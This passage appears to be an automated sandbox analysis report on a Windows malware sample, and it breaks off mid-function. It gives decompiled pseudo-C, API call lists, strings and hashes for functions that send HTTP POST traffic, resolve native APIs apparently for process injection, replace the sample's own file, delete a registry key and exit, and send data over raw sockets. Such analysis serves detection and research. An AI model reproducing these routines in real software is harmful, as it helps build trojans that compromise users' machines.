0x00425fd7
0x00000000
0x00425e00
0x00425e00
0x00425e07
0x00425e0c
0x00425e0e
0x00425e0e
0x00425e45
0x00425e49
0x00425fcf
0x00425fd0
0x00000000
0x00425e4f
0x00425e53
0x00425e61
0x00425e66
0x00425e69
0x00425e73
0x00425e81
0x00425e86
0x00425e8b
0x00425e9a
0x00425e9e
0x00425e9e
0x00425e8b
0x00425eac
0x00425eb1
0x00425eb8
0x00425ec0
0x00425ec0
0x00425ec1
0x00425ec0
0x00425ecc
0x00425ed2
0x00425ee6
0x00425ee8
0x00425eea
0x00425ef2
0x00425f0c
0x00425f1b
0x00425f1f
0x00425f1f
0x00425f2e
0x00425f2e
0x00425eea
0x00425f53
0x00425fc0
0x00425fc1
0x00425fc7
0x00425fcb
0x00000000
0x00425f55
0x00425f67
0x00425f6f
0x00425f80
0x00000000
0x00425f8c
0x00425f97
0x00425f99
0x00425f99
0x00425fa2
0x00425fae
0x00425fbd
0x00425fbd
0x00425f80
0x00425f53
0x00425e49
0x00425dfa
0x00425dd1

APIs

Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7

InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00425DC3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00425DEC
HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00425E3F
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00425E9A
HeapAlloc.KERNEL32(?,00000008,?), ref: 00425EE0
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00425F1B
HeapFree.KERNEL32(?,00000000,00000000), ref: 00425F2E
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00425F4A
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00425F77

Part of subcall function 004136E0: InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 004136F4
Part of subcall function 004136E0: GetLastError.KERNEL32(?,00000000,0040B7E5), ref: 004136FE
Part of subcall function 004136E0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,00000000,0040B7E5), ref: 0041371B
Part of subcall function 004136E0: InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 0041372C

Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD

InternetCloseHandle.WININET(00000000), ref: 00425FC1
InternetCloseHandle.WININET(00000000), ref: 00425FD0
InternetCloseHandle.WININET(00000000), ref: 00425FD7
HeapFree.KERNEL32(?,00000000,?), ref: 00425FEE
HeapFree.KERNEL32(?,00000000,?), ref: 00426006

Strings

POST, xrefs: 00425E07, 00425E3D
HTTP/1.1, xrefs: 00425E37
GET, xrefs: 00425E0E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Heap$Http$FreeRequest$CloseHandleQuery$AllocHeadersOpenOption$ConnectCrackErrorInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 3623753306-2753618334
Opcode ID: c97b695baf25488d8c4dd60bfe1713d967ab93b3ea14019e6f04ea9bc510bee6
Instruction ID: c9e906b204ff3371f9fd87185936f173b1b8c4aaaa8d1fb2663e22d1bdc92c86
Opcode Fuzzy Hash: c97b695baf25488d8c4dd60bfe1713d967ab93b3ea14019e6f04ea9bc510bee6
Instruction Fuzzy Hash: C471C271204311AFD320DB61ED85F5BB3E9EB88704F41452AFA04A72A1DB78ED05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C530, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041C530(signed char _a4) {
				char _v28;
				void* __ebx;
				void* __esi;
				void* _t8;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t19;
				struct HINSTANCE__* _t21;
				intOrPtr _t24;
				WCHAR* _t38;

				_t24 = E0041C4F0();
				 *0x42e910 = _t24;
				if(_t24 != 0) {
					if((_a4 & 0x00000001) != 0) {
						_push(E0041C420(_t24, "GetProcAddress"));
						_push(E0041C420(_t24, "LoadLibraryA"));
						_t8 = E004172A0( *0x42e90c);
						if(_t8 != 0) {
							goto L7;
						} else {
							return _t8;
						}
					} else {
						_t21 = GetModuleHandleW(0);
						 *0x42e90c = _t21;
						if(_t21 != 0) {
							L7:
							_t38 =  &_v28;
							E00424100(0xe5, _t38);
							_t11 = GetModuleHandleW(_t38);
							 *0x42e914 = _t11;
							if(_t11 == 0) {
								L14:
								return 0;
							} else {
								 *0x42e918 = GetProcAddress(_t11, "NtCreateThread");
								 *0x42e91c = GetProcAddress( *0x42e914, "NtCreateUserProcess");
								 *0x42e920 = GetProcAddress( *0x42e914, "NtQueryInformationProcess");
								 *0x42e924 = GetProcAddress( *0x42e914, "RtlUserThreadStart");
								 *0x42e928 = GetProcAddress( *0x42e914, "LdrLoadDll");
								_t19 = GetProcAddress( *0x42e914, "LdrGetDllHandle");
								 *0x42e92c = _t19;
								if( *0x42e918 != 0 ||  *0x42e91c != 0) {
									if( *0x42e920 == 0 ||  *0x42e928 == 0 || _t19 == 0) {
										goto L14;
									} else {
										return 1;
									}
								} else {
									goto L14;
								}
							}
						} else {
							return 0;
						}
					}
				} else {
					return 0;
				}
			}

0x0041c539
0x0041c53b
0x0041c543
0x0041c55a
0x0041c57d
0x0041c58e
0x0041c58f
0x0041c596
0x00000000
0x0041c598
0x0041c59d
0x0041c59d
0x0041c55c
0x0041c55e
0x0041c560
0x0041c567
0x0041c5a0
0x0041c5a1
0x0041c5aa
0x0041c5b2
0x0041c5b4
0x0041c5bb
0x0041c665
0x0041c66d
0x0041c5c1
0x0041c5db
0x0041c5ee
0x0041c5f5
0x0041c613
0x0041c626
0x0041c62b
0x0041c634
0x0041c639
0x0041c64b
0x00000000
0x0041c65a
0x0041c662
0x0041c662
0x00000000
0x00000000
0x00000000
0x0041c639
0x0041c569
0x0041c570
0x0041c570
0x0041c567
0x0041c545
0x0041c54b
0x0041c54b

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0041C55E

Strings

NtQueryInformationProcess, xrefs: 0041C5E8
LdrLoadDll, xrefs: 0041C60D
NtCreateThread, xrefs: 0041C5C7
GetProcAddress, xrefs: 0041C573
NtCreateUserProcess, xrefs: 0041C5D5
RtlUserThreadStart, xrefs: 0041C5FF
LoadLibraryA, xrefs: 0041C57E
LdrGetDllHandle, xrefs: 0041C620

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 4139908857-305303173
Opcode ID: f8214c2a06dd41b64f0d2b381970b00a58f68758d368a6ac1c2d67a1f0dc7bcd
Instruction ID: a5a2b0398250d1a2c0576c257951e2c622ad2994320102ed4298f7cda69fd4da
Opcode Fuzzy Hash: f8214c2a06dd41b64f0d2b381970b00a58f68758d368a6ac1c2d67a1f0dc7bcd
Instruction Fuzzy Hash: 4031E6F174131066CB709F6BAC81B977B98A798714F90403BE90093261D67DA6C6CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEE0, Relevance: 25.8, APIs: 17, Instructions: 254
synchronizationmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040CEE0(void* __ecx, void* __edx, void* _a4) {
				signed short _v204;
				signed short _v216;
				char _v676;
				char _v804;
				char _v1068;
				short _v1588;
				void* _v1592;
				long _v1596;
				void* _v1600;
				void* _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				void* _v1616;
				long _v1620;
				void* _v1624;
				long _v1628;
				long _v1632;
				void* _v1633;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t59;
				void* _t65;
				signed int _t67;
				void* _t71;
				long _t78;
				long _t79;
				void* _t83;
				void* _t85;
				void* _t91;
				signed int _t94;
				void* _t96;
				void* _t97;
				long _t98;
				void* _t101;
				void* _t102;
				signed char _t104;
				void* _t105;
				void* _t108;
				void* _t116;
				void* _t119;
				signed short _t126;
				signed int _t127;
				signed short _t134;
				WCHAR* _t145;
				signed int _t155;
				void* _t157;

				_t157 = (_t155 & 0xfffffff8) - 0x664;
				_t116 = _a4;
				_t59 = E0041CDD0( *_t116, (0 |  *_t116 != 0x00000000) + 0x78d0c214, 2);
				_t151 = _t59;
				_v1632 = _t151;
				if(_t151 != 0) {
					_v1600 =  &_v1068;
					_v1612 = E0040CB50;
					_v1608 = E0040CDA0;
					_v1604 =  *0x42edbc;
					_v1592 = _t116;
					E0041D150( &_v804);
					E00410820( &_v1068,  &_v676, 0x102);
					_t65 =  *_t116 & 0x000000ff;
					__eflags = _t65;
					if(_t65 == 0) {
						_t126 = _v216;
						_t67 = _t126 >> 0x10;
						_t127 = _t126 & 0x0000ffff;
					} else {
						__eflags = _t65 != 1;
						if(_t65 != 1) {
							_t67 = _v1628;
							_t127 = _v1632;
						} else {
							_t134 = _v204;
							_t67 = _t134 >> 0x10;
							_t127 = _t134 & 0x0000ffff;
						}
					}
					_v1628 = _t67 * 0xea60;
					_v1632 = _t127 * 0xea60;
					E00410870( &_v804,  &_v804, 0, 0x31c);
					_t139 =  *0x42edbc;
					_v1600 = 0;
					_t71 = WaitForSingleObject(_t139, 0);
					__eflags = _t71;
					if(_t71 != 0) {
						do {
							__eflags =  *_t116;
							_v1633 = 1;
							if( *_t116 != 0) {
								L22:
								_t151 = E00423A90();
								__eflags = _t151;
								if(_t151 == 0) {
									goto L42;
								} else {
									_v1620 = 0;
									_t97 = E00418BD0(0x4e23, 0x10000000, _t151);
									__eflags = _t97;
									if(_t97 == 0) {
										_t98 = _v1620;
									} else {
										_t98 = E00418C20(_t97);
									}
									_v1616 = _t98;
									HeapFree( *0x42e6d4, 0, _t151);
									__eflags = _v1616;
									if(_v1616 == 0) {
										L41:
										_t116 = _a4;
										goto L42;
									} else {
										_v1596 = 0;
										_t101 = E0040C730(_t139,  &_v1596, 1);
										__eflags = _t101;
										if(_t101 == 0) {
											_t119 = _v1633;
										} else {
											_t151 = _a4 + 8;
											_push( &_v1616);
											 *_t151 = 0xffffffff;
											_t104 = E0040D4A0();
											asm("sbb bl, bl");
											_t119 = ( ~_t104 & 0x000000fe) + 2;
											__eflags = _t151;
											if(_t151 != 0) {
												_t108 =  *_t151;
												__eflags = _t108 - 0xffffffff;
												if(_t108 != 0xffffffff) {
													FlushFileBuffers(_t108);
													CloseHandle( *_t151);
													 *_t151 = 0xffffffff;
												}
											}
											_t105 = _v1600;
											__eflags = _t105;
											if(_t105 != 0) {
												HeapFree( *0x42e6d4, 0, _t105);
											}
										}
										_t102 = _v1616;
										__eflags = _t102;
										if(_t102 != 0) {
											HeapFree( *0x42e6d4, 0, _t102);
										}
										__eflags = _t119 - 2;
										if(_t119 != 2) {
											__eflags = _t119;
											if(_t119 != 0) {
												goto L41;
											} else {
												_t78 = _v1628;
												_t116 = _a4;
											}
										} else {
											_t78 = _v1632;
											_t116 = _a4;
										}
									}
								}
							} else {
								__eflags = _v1588;
								_t28 = (0 | _v1588 != 0x00000000) - 1; // -1
								E0040C490(_t28 &  &_v1588, _t151, 0);
								_t145 = _t116 + 0x122;
								_t151 =  &_v1592;
								_t83 = E0040CE60(_t145,  &_v1592);
								__eflags = _t83;
								if(_t83 == 0) {
									L42:
									_t78 = 0x7530;
								} else {
									_t85 = E00418160(_t145);
									__eflags = _t85 - 0xffffffff;
									if(_t85 != 0xffffffff) {
										L12:
										__eflags = _t139;
										if(__eflags > 0) {
											goto L25;
										} else {
											if(__eflags < 0) {
												L15:
												_t139 =  &_v1588;
												__eflags = lstrcmpiW(_t145,  &_v1588);
												if(__eflags == 0) {
													goto L22;
												} else {
													_t151 = E0041CDD0(__eflags, 0x8793aef2, 2);
													__eflags = _t151;
													if(_t151 == 0) {
														goto L42;
													} else {
														_t91 = MoveFileExW(_t145,  &_v1588, 0xb);
														__eflags = _t91;
														if(_t91 == 0) {
															goto L42;
														} else {
															ReleaseMutex(_t151);
															CloseHandle(_t151);
															_t94 = 0;
															__eflags = _v1588;
															if(_v1588 != 0) {
																do {
																	_t94 = _t94 + 1;
																	__eflags =  *((short*)(_t157 + 0x40 + _t94 * 2));
																} while ( *((short*)(_t157 + 0x40 + _t94 * 2)) != 0);
															}
															_t96 = E00410820(_t145,  &_v1588, _t94 + _t94);
															_t139 = 0;
															__eflags = 0;
															 *((short*)(_t96 + _t145)) = 0;
															goto L22;
														}
													}
												}
											} else {
												__eflags = _t85 - 0xffffffff;
												if(_t85 > 0xffffffff) {
													goto L25;
												} else {
													goto L15;
												}
											}
										}
									} else {
										__eflags = _t139;
										if(_t139 == 0) {
											L25:
											SetFileAttributesW(_t145, 0x80);
											DeleteFileW(_t145);
											goto L42;
										} else {
											goto L12;
										}
									}
								}
							}
							_t139 =  *0x42edbc;
							_t79 = WaitForSingleObject(_t139, _t78);
							__eflags = _t79 - 0x102;
						} while (_t79 == 0x102);
						_t151 = _v1624;
					}
					ReleaseMutex(_t151);
					CloseHandle(_t151);
					HeapFree( *0x42e6d4, 0, _t116);
					__eflags = 0;
					return 0;
				} else {
					HeapFree( *0x42e6d4, _t59, _t116);
					_t5 = _t151 + 1; // 0x1
					return _t5;
				}
			}

0x0040cee6
0x0040ceed
0x0040cf01
0x0040cf06
0x0040cf08
0x0040cf0e
0x0040cf38
0x0040cf43
0x0040cf4b
0x0040cf53
0x0040cf57
0x0040cf5b
0x0040cf75
0x0040cf7d
0x0040cf7d
0x0040cf80
0x0040cf96
0x0040cf9f
0x0040cfa2
0x0040cf82
0x0040cf82
0x0040cf83
0x0040cfa7
0x0040cfab
0x0040cf85
0x0040cf85
0x0040cf8e
0x0040cf91
0x0040cf91
0x0040cf83
0x0040cfc0
0x0040cfce
0x0040cfd2
0x0040cfd7
0x0040cfe1
0x0040cfe6
0x0040cfec
0x0040cfee
0x0040cff4
0x0040cff4
0x0040cff7
0x0040cffc
0x0040d0cd
0x0040d0d2
0x0040d0d4
0x0040d0d6
0x00000000
0x0040d0dc
0x0040d0e6
0x0040d0ee
0x0040d0f3
0x0040d0f5
0x0040d118
0x0040d0f7
0x0040d0f9
0x0040d0f9
0x0040d11d
0x0040d129
0x0040d12f
0x0040d134
0x0040d1e4
0x0040d1e4
0x00000000
0x0040d13a
0x0040d140
0x0040d148
0x0040d14d
0x0040d14f
0x0040d1ad
0x0040d151
0x0040d158
0x0040d15b
0x0040d15c
0x0040d162
0x0040d16b
0x0040d170
0x0040d173
0x0040d175
0x0040d177
0x0040d179
0x0040d17c
0x0040d17f
0x0040d188
0x0040d18e
0x0040d18e
0x0040d17c
0x0040d194
0x0040d198
0x0040d19a
0x0040d1a5
0x0040d1a5
0x0040d19a
0x0040d1b1
0x0040d1b5
0x0040d1b7
0x0040d1c3
0x0040d1c3
0x0040d1c9
0x0040d1cc
0x0040d1d7
0x0040d1d9
0x00000000
0x0040d1db
0x0040d1db
0x0040d1df
0x0040d1df
0x0040d1ce
0x0040d1ce
0x0040d1d2
0x0040d1d2
0x0040d1cc
0x0040d134
0x0040d002
0x0040d004
0x0040d012
0x0040d017
0x0040d01c
0x0040d022
0x0040d026
0x0040d02b
0x0040d02d
0x0040d1e7
0x0040d1e7
0x0040d033
0x0040d035
0x0040d03a
0x0040d03d
0x0040d047
0x0040d047
0x0040d049
0x00000000
0x0040d04f
0x0040d04f
0x0040d05a
0x0040d05a
0x0040d066
0x0040d068
0x00000000
0x0040d06a
0x0040d076
0x0040d078
0x0040d07a
0x00000000
0x0040d080
0x0040d088
0x0040d08e
0x0040d090
0x00000000
0x0040d096
0x0040d097
0x0040d09e
0x0040d0a4
0x0040d0a6
0x0040d0ab
0x0040d0b0
0x0040d0b0
0x0040d0b1
0x0040d0b1
0x0040d0b0
0x0040d0c2
0x0040d0c7
0x0040d0c7
0x0040d0c9
0x00000000
0x0040d0c9
0x0040d090
0x0040d07a
0x0040d051
0x0040d051
0x0040d054
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d054
0x0040d04f
0x0040d03f
0x0040d03f
0x0040d041
0x0040d100
0x0040d106
0x0040d10d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d041
0x0040d03d
0x0040d02d
0x0040d1ec
0x0040d1f4
0x0040d1fa
0x0040d1fa
0x0040d205
0x0040d205
0x0040d20a
0x0040d211
0x0040d220
0x0040d228
0x0040d22e
0x0040cf10
0x0040cf19
0x0040cf1f
0x0040cf28
0x0040cf28

APIs

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

HeapFree.KERNEL32(?,00000000,?,-78D0C214,00000002), ref: 0040CF19
WaitForSingleObject.KERNEL32(?,00000000,?,00000000,0000031C,?,?,00000102), ref: 0040CFE6
lstrcmpiW.KERNEL32(?,?,00000000), ref: 0040D060
MoveFileExW.KERNEL32(?,?,0000000B,8793AEF2,00000002), ref: 0040D088
ReleaseMutex.KERNEL32(00000000), ref: 0040D097
CloseHandle.KERNEL32(00000000), ref: 0040D09E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleMutexObjectSingleWait$CreateFileFreeHeapMoveReleaselstrcmpi
String ID:
API String ID: 2718145414-0
Opcode ID: b8450cf580a8a9329e3994ad970eb7cea5eeb24c83fb09b19ae8a670dc5e08e7
Instruction ID: 64815261c0c6306012076515ce72e43cb13ff191ab19a70270f592cd54a94a66
Opcode Fuzzy Hash: b8450cf580a8a9329e3994ad970eb7cea5eeb24c83fb09b19ae8a670dc5e08e7
Instruction Fuzzy Hash: CF9104716043019BD324DB64DC84BAB77A9EF89314F040A3EF981EB2D1DB38D945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004101F0, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 212
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004101F0() {
				char _v1020;
				char _v1148;
				char _v1152;
				char _v1820;
				short _v1948;
				WCHAR* _v1956;
				char _v2468;
				short _v2472;
				short _v2988;
				short _v2992;
				WCHAR* _v2996;
				char _v3038;
				char _v3058;
				WCHAR* _v3070;
				intOrPtr _v3090;
				char _v3480;
				char _v3488;
				char _v3500;
				char _v3740;
				char _v3744;
				char _v3772;
				short _v3844;
				char _v3848;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t59;
				signed int _t60;
				void* _t63;
				int _t74;
				signed int _t76;
				signed char _t81;
				CHAR* _t82;
				WCHAR* _t84;
				signed int _t87;
				WCHAR* _t88;
				signed int _t90;
				WCHAR* _t91;
				signed char* _t108;
				CHAR* _t109;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t130;
				intOrPtr _t138;
				WCHAR* _t139;
				char* _t140;
				signed int _t145;
				void* _t147;

				_t147 = (_t145 & 0xfffffff8) - 0xf00;
				_t130 =  &_v2468;
				E0041D210(1, _t130);
				PathRemoveFileSpecW(_t130);
				_v2988 = 0;
				E0041D150( &_v1948);
				E00410820( &_v3740,  &_v1820, 0x102);
				E00412640(E00410820( &_v3488, 0x42eb80, 0x1e6),  &_v3500, 0x1e6);
				_t59 = 0;
				if(_v3090 == 0) {
					L2:
					_t60 = MultiByteToWideChar(0, 0,  &_v3058, _t59,  &_v3844, 0x32);
					if(_t60 >= 0x32) {
						_t60 = 0;
					}
					 *((short*)(_t147 + 0x10 + _t60 * 2)) = 0;
					if(_t60 == 0) {
						L11:
						PathRemoveFileSpecW( &_v2988);
						 *0x42e8f8 =  *0x42e8f8 | 0x00000002;
						SetEvent( *0x42edbc);
						_t63 =  *0x42edc0;
						__eflags = _t63 - 0xffffffff;
						if(__eflags != 0) {
							WaitForSingleObject(_t63, 0xffffffff);
						}
						E0040ED80(__eflags);
						E004185D0( &_v2468);
						E004185D0( &_v2988);
						_v1948 = 0;
						E0041D150( &_v1148);
						E00410820( &_v3740,  &_v1020, 0x102);
						E00412640( &_v3740, E00410820( &_v3488, 0x42eb80, 0x1e6), 0x1e6);
						_t74 = 0;
						__eflags = _v3070;
						if(_v3070 == 0) {
							L15:
							_t76 = MultiByteToWideChar(0, 0,  &_v3038, _t74,  &_v3844, 0x32);
							__eflags = _t76 - 0x32;
							if(_t76 >= 0x32) {
								_t76 = 0;
								__eflags = 0;
							}
							 *((short*)(_t147 + 0x10 + _t76 * 2)) = 0;
							__eflags = _t76;
							if(_t76 == 0) {
								L24:
								SHDeleteKeyW(0x80000001,  &_v1948);
								CharToOemW( &_v2472,  &_v3480);
								CharToOemW( &_v2992,  &_v3744);
								_t138 =  *0x401b54; // 0x4049e8
								_t108 =  &_v3848;
								_t81 = 0;
								_t139 = _t138 - _t108;
								__eflags = _t139;
								do {
									 *_t108 =  *(_t139 + _t108) ^ _t81 ^ 0x00000046;
									_t81 = _t81 + 1;
									_t108 =  &(_t108[1]);
									__eflags = _t81 - 0x4c;
								} while (_t81 < 0x4c);
								_t82 =  &_v3744;
								_push(_t82);
								_t109 =  &_v3480;
								_push(_t109);
								_push(_t82);
								_push(_t109);
								_t140 =  &_v1152;
								_v3772 = 0;
								_t84 = E00411D70(_t109, 0x474, _t140,  &_v3848);
								__eflags = _t84;
								if(_t84 > 0) {
									_push(_t140);
									E00412E80();
								}
								__eflags =  *0x42edc0 - 0xffffffff;
								if( *0x42edc0 != 0xffffffff) {
									return 1;
								} else {
									ExitProcess(0);
								}
							} else {
								_t111 =  &_v3844;
								while(1) {
									_t87 =  *_t111 & 0x0000ffff;
									__eflags = _t87 - 0x5c;
									if(_t87 == 0x5c) {
										goto L21;
									}
									__eflags = _t87 - 0x2f;
									if(_t87 != 0x2f) {
										_t88 = PathCombineW( &_v1948, L"SOFTWARE\\Microsoft", _t111);
										__eflags = _t88;
										if(_t88 == 0) {
											_v1956 = _t88;
										}
										goto L24;
									}
									L21:
									_t111 =  &(_t111[1]);
								}
							}
						} else {
							do {
								_t74 = _t74 + 1;
								__eflags =  *((char*)(_t147 + _t74 + 0x336));
							} while ( *((char*)(_t147 + _t74 + 0x336)) != 0);
							goto L15;
						}
					}
					_t112 =  &_v3844;
					while(1) {
						_t90 =  *_t112 & 0x0000ffff;
						if(_t90 != 0x5c && _t90 != 0x2f) {
							break;
						}
						_t112 =  &(_t112[1]);
					}
					_t91 = PathCombineW( &_v2988, 0x42e958, _t112);
					__eflags = _t91;
					if(_t91 == 0) {
						_v2996 = _t91;
					}
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t59 = _t59 + 1;
				} while ( *((char*)(_t147 + _t59 + 0x322)) != 0);
				goto L2;
			}

0x004101f6
0x00410200
0x0041020c
0x0041021a
0x00410225
0x0041022d
0x00410247
0x00410272
0x00410277
0x00410280
0x0041028d
0x004102a7
0x004102ac
0x004102ae
0x004102ae
0x004102b8
0x004102bf
0x004102f3
0x004102fb
0x00410303
0x0041030b
0x00410311
0x00410316
0x00410319
0x0041031e
0x0041031e
0x00410324
0x00410330
0x0041033c
0x00410343
0x00410352
0x0041036c
0x00410392
0x00410397
0x00410399
0x004103a0
0x004103ad
0x004103c1
0x004103c3
0x004103c6
0x004103c8
0x004103c8
0x004103c8
0x004103cc
0x004103d1
0x004103d3
0x0041040e
0x0041041b
0x00410437
0x00410446
0x00410448
0x0041044e
0x00410454
0x00410456
0x00410456
0x00410458
0x00410460
0x00410462
0x00410463
0x00410464
0x00410464
0x0041046a
0x0041046e
0x0041046f
0x00410476
0x00410479
0x0041047c
0x00410487
0x0041048e
0x00410493
0x0041049b
0x0041049d
0x004104a1
0x004104a2
0x004104a2
0x004104a7
0x004104ae
0x004104c1
0x004104b0
0x004104b2
0x004104b2
0x004103d5
0x004103d5
0x004103e0
0x004103e0
0x004103e3
0x004103e6
0x00000000
0x00000000
0x004103e8
0x004103eb
0x00410400
0x00410402
0x00410404
0x00410406
0x00410406
0x00000000
0x00410404
0x004103ed
0x004103ed
0x004103ed
0x004103e0
0x004103a2
0x004103a2
0x004103a2
0x004103a3
0x004103a3
0x00000000
0x004103a2
0x004103a0
0x004102c1
0x004102c5
0x004102c5
0x004102cb
0x00000000
0x00000000
0x004102d2
0x004102d2
0x004102e5
0x004102e7
0x004102e9
0x004102eb
0x004102eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00410282
0x00410282
0x00410282
0x00410283
0x00000000

APIs

PathRemoveFileSpecW.SHLWAPI(?,?,00000000), ref: 0041021A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000032,?,000001E6,?,0042EB80,000001E6,?,?,00000102), ref: 004102A7
PathCombineW.SHLWAPI(?,0042E958,?), ref: 004102E5
PathRemoveFileSpecW.SHLWAPI(?), ref: 004102FB
SetEvent.KERNEL32(?), ref: 0041030B
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041031E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000032,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102), ref: 004103C1
PathCombineW.SHLWAPI(?,SOFTWARE\Microsoft,?), ref: 00410400
SHDeleteKeyW.SHLWAPI(80000001,?), ref: 0041041B
CharToOemW.USER32 ref: 00410437
CharToOemW.USER32 ref: 00410446
ExitProcess.KERNEL32 ref: 004104B2

Strings

SOFTWARE\Microsoft, xrefs: 004103F3
I@, xrefs: 00410448

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPath$ByteCombineFileMultiRemoveSpecWide$DeleteEventExitObjectProcessSingleWait
String ID: SOFTWARE\Microsoft$I@
API String ID: 1626940994-3897302188
Opcode ID: f60a68b339af97d299d4a00cf4313e59deb5c4f4410d293b0e509c09cc9375f0
Instruction ID: 6db825f7d904601bcc1a3abfa4745a85e688a03431ff905cfe5ce3cf0b046a67
Opcode Fuzzy Hash: f60a68b339af97d299d4a00cf4313e59deb5c4f4410d293b0e509c09cc9375f0
Instruction Fuzzy Hash: 8571F471508340ABD334E775DC85BEB73E8AF88304F004E2EF599D2191EAB8A9C5C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A680, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 150networkmemoryCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 0041A6D6
connect.WS2_32(00000000,00000002,-0000001D), ref: 0041A6FC
closesocket.WS2_32(00000000), ref: 0041A707
setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 0041A731
setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0041A76E
WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 0041A7A2
send.WS2_32(00000000,00000000,00000005,00000000), ref: 0041A7C5
send.WS2_32(00000000,?,00000004,00000000), ref: 0041A7D5
shutdown.WS2_32(00000000,00000002), ref: 0041A807
closesocket.WS2_32(00000000), ref: 0041A80E
shutdown.WS2_32(?,00000002), ref: 0041A820
closesocket.WS2_32 ref: 0041A827
HeapFree.KERNEL32(?,00000000,?), ref: 0041A837

Strings

p0u, xrefs: 0041A707, 0041A80E, 0041A827

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: closesocket$sendsetsockoptshutdown$FreeHeapIoctlconnectsocket
String ID: p0u
API String ID: 365435346-1742372003
Opcode ID: c320382269384521bc3b2b4cd832ade2ccd49376224eea5c7801224949aa6cf3
Instruction ID: 51c87355226266dfec6c8b2a64d1bf199c8783f4f0f7c79dfd6288198f99362c
Opcode Fuzzy Hash: c320382269384521bc3b2b4cd832ade2ccd49376224eea5c7801224949aa6cf3
Instruction Fuzzy Hash: 0A51A4711043006BD310AF69CD89F6B77A8ABC9724F104B1DF266D72E1D7789886C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DFE0, Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 232
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041DFE0(void* __eax, intOrPtr _a4, signed int* _a8) {
				char _v536;
				char _v652;
				char _v664;
